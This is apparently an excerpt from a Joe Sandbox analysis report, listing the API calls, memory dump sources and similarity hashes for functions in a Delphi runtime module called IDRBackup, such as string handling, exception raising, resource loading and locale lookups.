                                                                                                    • Part of subcall function 50028754: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,50028822), ref: 500287F6
                                                                                                  • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500295F1), ref: 500294E3
                                                                                                    • Part of subcall function 5000A164: @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120 ref: 5000A18D
                                                                                                    • Part of subcall function 5000A164: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000), ref: 5000A1A4
                                                                                                    • Part of subcall function 5000A164: @System@Move$qqrpxvpvi.RTL120(00000000), ref: 5000A1B7
                                                                                                    • Part of subcall function 5000A164: @System@@LStrClr$qqrpv.RTL120(00000000), ref: 5000A1C4
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,00000000,500295F1), ref: 50029504
                                                                                                  • @System@@UStrCatN$qqrv.RTL120(?,?,?,00000000,00000000,500295F1), ref: 50029517
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,?,?,00000000,00000000,500295F1), ref: 50029534
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,?,?,?,00000000,00000000,500295F1), ref: 50029560
                                                                                                  • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,?,00000000,00000000,500295F1), ref: 50029571
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001D4A4), ref: 5001D366
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001D4A4), ref: 5001D394
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @Sysutils@FileExists$qqrx20System@UnicodeString.RTL120(00000000,5001D4A4), ref: 5001D3A9
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(?,00000000,5001D4A4), ref: 5001D3C0
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,00000000,5001D4A4), ref: 5001D3F2
                                                                                                  • @Sysutils@NextCharIndex$qqrx20System@UnicodeStringi.RTL120(?,00000000,5001D4A4), ref: 5001D410
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(?,00000000,5001D4A4), ref: 5001D421
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001D4A4), ref: 5001D43D
                                                                                                  • @Sysutils@AnsiLastChar$qqrx20System@UnicodeString.RTL120(?,00000000,5001D4A4), ref: 5001D447
                                                                                                  • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,00000000,5001D4A4), ref: 5001D469
                                                                                                  • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,5001D4A4), ref: 5001D477
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001D4A4), ref: 5001D489
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Unicode$System@$String$System@@$AnsiStringx20$FromStr$qqrr20Stringx27System@%Sysutils@T$us$i0$%$Asg$qqrr20Cat$qqrr20EnsureInternalString$qqrr20$CharChar$qqrx20Copy$qqrx20Exists$qqrx20FileIndex$qqrx20LastNextStringiStringii
                                                                                                  • String ID: \
                                                                                                  • API String ID: 1823336666-2967466578
                                                                                                  • Opcode ID: df0ab2c0c2f59ba5373b8656c7223b6ccec50d516bfc707d398026b4c07643d9
                                                                                                  • Instruction ID: 6d0a0c84b3d9e99a300f93f86f148e16fca29f9739a9876171c5e92ec0c1f276
                                                                                                  • Opcode Fuzzy Hash: df0ab2c0c2f59ba5373b8656c7223b6ccec50d516bfc707d398026b4c07643d9
                                                                                                  • Instruction Fuzzy Hash: 2C417134E00989DFDB10EFA8D99289EB3F1EF44300B5082A7E510E7221D770AF86D791
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5002A8E2), ref: 5002A7B7
                                                                                                  • @System@LoadResourceModule$qqrpbo.RTL120(00000000,5002A8E2), ref: 5002A7C4
                                                                                                    • Part of subcall function 5000C58C: GetModuleFileNameW.KERNEL32(00000000,?,00000105,59800000,59857008), ref: 5000C5A8
                                                                                                    • Part of subcall function 5000C58C: RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,59800000,59857008), ref: 5000C5C8
                                                                                                    • Part of subcall function 5000C58C: RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105,59800000,59857008), ref: 5000C5E6
                                                                                                    • Part of subcall function 5000C58C: RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000), ref: 5000C604
                                                                                                    • Part of subcall function 5000C58C: RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 5000C622
                                                                                                    • Part of subcall function 5000C58C: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,00000000,5000C6C0,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?), ref: 5000C66B
                                                                                                    • Part of subcall function 5000C58C: RegQueryValueExW.ADVAPI32(?,5000C8B4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,5000C6C0,?,80000001), ref: 5000C689
                                                                                                    • Part of subcall function 5000C58C: RegCloseKey.ADVAPI32(?,5000C6C7,00000000,?,?,00000000,5000C6C0,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 5000C6BA
                                                                                                  • GetModuleHandleW.KERNEL32(?,00000000,5002A8E2), ref: 5002A7D3
                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00000000,5002A8E2), ref: 5002A7E6
                                                                                                  • GetLastError.KERNEL32(?,00000000,5002A8E2), ref: 5002A801
                                                                                                  • @Sysutils@SysErrorMessage$qqrui.RTL120(?,00000000,5002A8E2), ref: 5002A809
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,?,00000000,5002A8E2), ref: 5002A82B
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,?,?,00000000,5002A8E2), ref: 5002A830
                                                                                                  • FindResourceW.KERNEL32(00000000,DESCRIPTION,0000000A,00000000,5002A8C5,?,00000000,5002A8E2), ref: 5002A84E
                                                                                                  • LoadResource.KERNEL32(00000000,00000000,00000000,DESCRIPTION,0000000A,00000000,5002A8C5,?,00000000,5002A8E2), ref: 5002A85C
                                                                                                  • LockResource.KERNEL32(00000000,00000000,5002A8A1,?,00000000,00000000,00000000,DESCRIPTION,0000000A,00000000,5002A8C5,?,00000000,5002A8E2), ref: 5002A87C
                                                                                                  • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(00000000,00000000,5002A8A1,?,00000000,00000000,00000000,DESCRIPTION,0000000A,00000000,5002A8C5,?,00000000,5002A8E2), ref: 5002A885
                                                                                                  • FreeResource.KERNEL32(00000000,5002A8A8,?,00000000,00000000,00000000,DESCRIPTION,0000000A,00000000,5002A8C5,?,00000000,5002A8E2), ref: 5002A89B
                                                                                                  Strings
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Resource$Open$LoadSystem@@Unicode$ErrorModuleQueryStringSysutils@Value$Asg$qqrr20Char$qqrr20CloseExcept$qqrvException@$bctr$qqrp20FileFindFreeFromHandleLastLibraryLockMessage$qqruiModule$qqrpboNameRaiseRecpx14RecxiStringpbStringx20
                                                                                                  • String ID: DESCRIPTION
                                                                                                  • API String ID: 3160456903-3773289166
                                                                                                  • Opcode ID: 9c728f30882331a281c9099e372204b5d02cfbfa5d2dcb8aba3413716321baf8
                                                                                                  • Instruction ID: 2fbb488c572c727051016de5f65cec4f5785d2b5e39462af3f2b4d4cfef47028
                                                                                                  • Opcode Fuzzy Hash: 9c728f30882331a281c9099e372204b5d02cfbfa5d2dcb8aba3413716321baf8
                                                                                                  • Instruction Fuzzy Hash: 2731A270A062D9AFEB05CFF4EC55B9DB7F9EB1A304F9045A6F500A3242DE385A40C7A0
                                                                                                  APIs
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,5002DB19,?,00000000), ref: 5002D9D3
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(00000000,5002DB19,?,00000000), ref: 5002D9CE
                                                                                                    • Part of subcall function 500266E0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500266EA
                                                                                                    • Part of subcall function 500266E0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 500266FA
                                                                                                    • Part of subcall function 500266E0: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 50026705
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002DB19,?,00000000), ref: 5002D9F7
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002DB19,?,00000000), ref: 5002D9FC
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002DB19,?,00000000), ref: 5002DA1F
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002DB19,?,00000000), ref: 5002DA24
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002DB19,?,00000000), ref: 5002DA41
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002DB19,?,00000000), ref: 5002DA70
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002DB19,?,00000000), ref: 5002DA75
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120(00000000,5002DB19,?,00000000), ref: 5002DA7F
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002DB19,?,00000000), ref: 5002DAAA
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002DB19,?,00000000), ref: 5002DAAF
                                                                                                  • @Sysutils@TEncoding@GetByteCount$qqrx20System@UnicodeStringii.RTL120(5002D963,00000000,?,00000000,5002DB19,?,00000000), ref: 5002DABD
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(5002D963,00000000,?,00000000,5002DB19,?,00000000), ref: 5002DAD8
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(5002D963,00000000,?,00000000,5002DB19,?,00000000), ref: 5002DADD
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$String$RaiseSysutils@$Except$qqrvException@$bctr$qqrp20$Recpx14Recxi$Unicode$AfterAnsiArrayByteClassClassoConstruction$qqrp14Count$qqrx20Create$qqrp17Encoding@Error$qqrucFromInternalLength$qqrvList$qqrvLoadMetaObjectStr$qqrr20String$qqrp20StringiiStringx27System@%T$us$i0$%
                                                                                                  • String ID:
                                                                                                  • API String ID: 1510222668-0
                                                                                                  • Opcode ID: 04cde6b8ab52445afbce40d0579e5524d879601997f477b20f500470919b9e46
                                                                                                  • Instruction ID: c200511c8af83f716f27c4f8f74ee48d0f5db12a54d239dde748c8e376a153b6
                                                                                                  • Opcode Fuzzy Hash: 04cde6b8ab52445afbce40d0579e5524d879601997f477b20f500470919b9e46
                                                                                                  • Instruction Fuzzy Hash: 1551A330A065869FDB10DFA8ED91AAEB7F9EF54304F508266F904D7351CB70AE01CBA1
                                                                                                  APIs
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(?,?), ref: 5002D7AB
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(?,?), ref: 5002D7A6
                                                                                                    • Part of subcall function 500266E0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500266EA
                                                                                                    • Part of subcall function 500266E0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 500266FA
                                                                                                    • Part of subcall function 500266E0: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 50026705
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(?,?), ref: 5002D7C9
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(?,?), ref: 5002D7CE
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,00000000,?,?), ref: 5002D7F1
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,?,?), ref: 5002D7F6
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,00000000,?,?), ref: 5002D819
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,?,?), ref: 5002D81E
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120(?,?), ref: 5002D826
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,00000000,?,?), ref: 5002D84B
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,?,?), ref: 5002D850
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120(?,?), ref: 5002D85A
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,00000000,?,?), ref: 5002D885
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,?,?), ref: 5002D88A
                                                                                                  • @Sysutils@TEncoding@GetByteCount$qqrx24System@%DynamicArray$tb%ii.RTL120(5002D771,00000000,00000000,?,?), ref: 5002D898
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(5002D771,00000000,00000000,?,?), ref: 5002D8B3
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(5002D771,00000000,00000000,?,?), ref: 5002D8B8
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$RaiseStringSysutils@$Except$qqrvException@$bctr$qqrp20$Recpx14Recxi$ArrayLength$qqrv$AfterArray$tb%iiByteClassClassoConstruction$qqrp14Count$qqrx24Create$qqrp17DynamicEncoding@Error$qqrucList$qqrvLoadMetaObjectString$qqrp20System@%
                                                                                                  • String ID:
                                                                                                  • API String ID: 1237184820-0
                                                                                                  • Opcode ID: 952b74f017d3762d293e9f3b11fffa3ac327c9001284a9ce47d9ecc3364eade9
                                                                                                  • Instruction ID: a3c714428ec61206f39ef323b742ab525dddacf128d87db4c55a7e7c244486e1
                                                                                                  • Opcode Fuzzy Hash: 952b74f017d3762d293e9f3b11fffa3ac327c9001284a9ce47d9ecc3364eade9
                                                                                                  • Instruction Fuzzy Hash: E2416F30E0658A9FDB10DFD8FD85AAEB7B9AF54304F10425AF90497352DB71AE01CBA1
                                                                                                  APIs
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120 ref: 5002DD6B
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120 ref: 5002DD66
                                                                                                    • Part of subcall function 500266E0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500266EA
                                                                                                    • Part of subcall function 500266E0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 500266FA
                                                                                                    • Part of subcall function 500266E0: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 50026705
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?), ref: 5002DD8E
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?), ref: 5002DD93
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?), ref: 5002DDB6
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?), ref: 5002DDBB
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120 ref: 5002DDC3
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?), ref: 5002DDE8
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?), ref: 5002DDED
                                                                                                  • @Sysutils@TEncoding@GetCharCount$qqrx25System@%DynamicArray$tuc%ii.RTL120(?), ref: 5002DDFB
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120(?), ref: 5002DE0C
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?), ref: 5002DE2F
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?), ref: 5002DE34
                                                                                                  • @System@@DynArrayLength$qqrv.RTL120(00000000,?,?), ref: 5002DE3E
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(00000000,?,?), ref: 5002DE59
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?), ref: 5002DE5E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$RaiseStringSysutils@$Except$qqrvException@$bctr$qqrp20$Recpx14Recxi$ArrayLength$qqrv$AfterArray$tuc%iiCharClassClassoConstruction$qqrp14Count$qqrx25Create$qqrp17DynamicEncoding@Error$qqrucList$qqrvLoadMetaObjectString$qqrp20System@%
                                                                                                  • String ID:
                                                                                                  • API String ID: 599856924-0
                                                                                                  • Opcode ID: 4b8d796bfac4fa0ae40b9c02b7f6622a5a3d8938baecce40c243d743d60e7c27
                                                                                                  • Instruction ID: 7c7a2039e6845435a2d692603e14150ae7f22c60f5061fde4fa10c9b3cf0b75a
                                                                                                  • Opcode Fuzzy Hash: 4b8d796bfac4fa0ae40b9c02b7f6622a5a3d8938baecce40c243d743d60e7c27
                                                                                                  • Instruction Fuzzy Hash: CB416430A025869BDB10DF98FD91AAEB7B9AF54304F50415AF9049B352CB71AE05CBA1
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50023814), ref: 500236D8
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50023814), ref: 50023706
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000200,00000000,50023814), ref: 5002371A
                                                                                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000200,00000000,50023814), ref: 50023726
                                                                                                  • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 5002372C
                                                                                                  • @System@@UStrFromWArray$qqrr20System@UnicodeStringpbi.RTL120(00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 50023746
                                                                                                  • @Sysutils@CharToByteLen$qqrx20System@UnicodeStringi.RTL120(?,00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 5002376D
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 5002377B
                                                                                                    • Part of subcall function 5000A464: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000A525), ref: 5000A4A0
                                                                                                    • Part of subcall function 5000A464: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,5000A525), ref: 5000A4F9
                                                                                                  • @Sysutils@ByteToCharLen$qqrx20System@UnicodeStringi.RTL120(00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 500237A6
                                                                                                  • @Sysutils@CharToByteIndex$qqrx20System@UnicodeStringi.RTL120(00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 500237B7
                                                                                                  • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 500237D3
                                                                                                  • @Sysutils@CharToByteLen$qqrx20System@UnicodeStringi.RTL120(00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 500237E3
                                                                                                  • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 500237EE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$System@@$Char$From$ByteStringStringiSysutils@$Len$qqrx20Stringpbi$Asg$qqrr20Len$qqrr20Stringx20$AnsiArray$qqrr20Char$qqrr20Char$qqrx20Copy$qqrx20DateFormatIndex$qqrx20InternalLocaleStr$qqrr20StringiiStringpbStringx27System@%T$us$i0$%Thread
                                                                                                  • String ID:
                                                                                                  • API String ID: 3483906196-0
                                                                                                  • Opcode ID: 07ec6dc5ae61966c67d195a7f413b0f24ab838b4146774390f1e3ff9206560d6
                                                                                                  • Instruction ID: 4f9631fb190bdf22358dadba8d9e4bcdbf434579e9ae2086efaa57f8c8f505f9
                                                                                                  • Opcode Fuzzy Hash: 07ec6dc5ae61966c67d195a7f413b0f24ab838b4146774390f1e3ff9206560d6
                                                                                                  • Instruction Fuzzy Hash: 7231A274A461998FEF20DBA8E89569DB3F4EF18300F5042A6F808E7315DA34DE01CBD1
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50022B5C), ref: 50022A20
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50022B5C), ref: 50022A4E
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000100,00000000,50022B5C), ref: 50022A62
                                                                                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022A6E
                                                                                                  • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022A74
                                                                                                  • @System@@UStrFromWArray$qqrr20System@UnicodeStringpbi.RTL120(00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022A8E
                                                                                                  • @Sysutils@CharToByteLen$qqrx20System@UnicodeStringi.RTL120(?,00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022AB5
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022AC3
                                                                                                    • Part of subcall function 5000A464: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000A525), ref: 5000A4A0
                                                                                                    • Part of subcall function 5000A464: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,5000A525), ref: 5000A4F9
                                                                                                  • @Sysutils@ByteToCharLen$qqrx20System@UnicodeStringi.RTL120(00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022AEE
                                                                                                  • @Sysutils@CharToByteIndex$qqrx20System@UnicodeStringi.RTL120(00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022AFF
                                                                                                  • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022B1B
                                                                                                  • @Sysutils@CharToByteLen$qqrx20System@UnicodeStringi.RTL120(00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022B2B
                                                                                                  • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022B36
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$System@@$Char$From$ByteStringStringiSysutils@$Len$qqrx20Stringpbi$Asg$qqrr20Len$qqrr20Stringx20$AnsiArray$qqrr20Char$qqrr20Char$qqrx20Copy$qqrx20DateFormatIndex$qqrx20InternalLocaleStr$qqrr20StringiiStringpbStringx27System@%T$us$i0$%Thread
                                                                                                  • String ID:
                                                                                                  • API String ID: 3483906196-0
                                                                                                  • Opcode ID: 14b31e75bbe4f29b0344d47f151fd9c0e418cd3dfaf5d63b438e38d57a2d97fd
                                                                                                  • Instruction ID: 53e8520a94321b9216bfb608fab58842445848e9737d4ff382ae0df39ef9d34b
                                                                                                  • Opcode Fuzzy Hash: 14b31e75bbe4f29b0344d47f151fd9c0e418cd3dfaf5d63b438e38d57a2d97fd
                                                                                                  • Instruction Fuzzy Hash: EA31B234A425999FDB11DFA8E89569DB3F4EF18300F5042A6F808E7315DB349E02CBD2
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C84D
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C749
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C774
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001C8D4), ref: 5001C79A
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C7BC
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C7E7
